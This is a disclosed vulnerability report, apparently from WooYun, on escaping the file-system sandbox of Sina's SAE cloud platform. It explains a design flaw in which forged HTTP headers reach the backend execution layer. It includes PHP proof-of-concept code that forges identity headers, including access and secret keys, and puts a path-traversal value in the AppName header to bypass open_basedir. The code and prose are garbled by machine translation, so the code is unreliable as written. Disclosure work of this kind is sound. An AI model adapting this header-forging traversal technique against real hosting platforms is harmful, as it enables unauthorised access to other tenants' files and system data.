File System Sandbox Bypass on Sina SAE Cloud Platform

This problem was discovered earlier and has been notified to SAE for repair, mainly because there are some defects in the design of the code execution environment, resulting in the user code escaping from the file system sandbox of the execution environment, access platform system files and other users' file resources
Detailed Description: In the design architecture of SAE, the application validity check logic is separated from the real execution environment. The execution environment is fully designed to execute code, the real application validity check logic (such as existence, resource overload, and ban) is implemented by another layer. The real code execution environment is only responsible for executing the code, the restrictions for code execution are dynamic. The execution layer and the front-end logic layer communicate over the http protocol, and the application's identity and permissions are all transmitted from the front-end in the http header, in this way, there is a logic error. If the application can construct an http request, it can call the logic of the backend execution layer. However, there is a defect in the logic of the execution layer, the dynamically generated open_basedir is composed of application names, which may be bypassed.
1. Execute your own http Request
 
If (in_array ("http", stream_get_wrappers ())){
 
Stream_wrapper_unregister ("http ");
 
}
 
 
 
Stream_wrapper_restore ("http ");
 
 
$ Opt = array (
 
'Http' => array (
 
'Header' => "Host: Drivers \ r \ nX-Forwarded-For: 61.135.165.180, drivers \ r \ nAppName: webmanage \ r \ nAccessKey: ynz0jyo1k1 \ r \ nSecretKey: export \ r \ nAppHash: 928 \ r \ nMysqlPort: 3307 \ r \ nAppCookie: default_version = 1; xhprof =; debug = 1; \ r \ nConnection: close \ r \ nCookie: saeut = 220.181.50.244.1321955942519836 \ r \ nAppVersion: 1 ",
 
'Protocol _ version' => '1. 1'
 
)
 
);
 
Stream_context_set_default ($ opt );
 
$ D = stream_context_get_default ();
 
Var_dump (file_get_contents ("http: // 10.67.15.23/phpinfo. php "));
 
2. Bypass open_basedir with backend logic Defects
 
 
$ Opt = array (
 
'Http' => array (
 
'Header' => "Host: wooyun.sinaapp.com \ r \ nX-Forwarded-For: 61.135.165.180, 61.135.165.180 \ r \ nAppName: webmanage/1 /:/:/.. /.. /.. /\ r \ nAccessKey: ynztttt1k1 \ r \ nSecretKey: encrypt \ r \ nAppHash: 928 \ r \ nMysqlPort: 3307 \ r \ nAppCookie: default_version = 1; xhprof =; debug = 1; \ r \ nConnection: close \ r \ nCookie: saeut = 220.181.50.244.1321955942519836 \ r \ nAppVersion: 1 ",
 
'Protocol _ version' => '1. 1'
 
)
 
);
 
Stream_context_set_default ($ opt );
 
$ D = stream_context_get_default ();
 
Var_dump (file_get_contents ("http: // 10.67.15.23/phpinfo. php "));
Proof of vulnerability:
 
 

 
 
 
Solution: SAE has been fixed
 
 
Author Jie Shi @ wooyun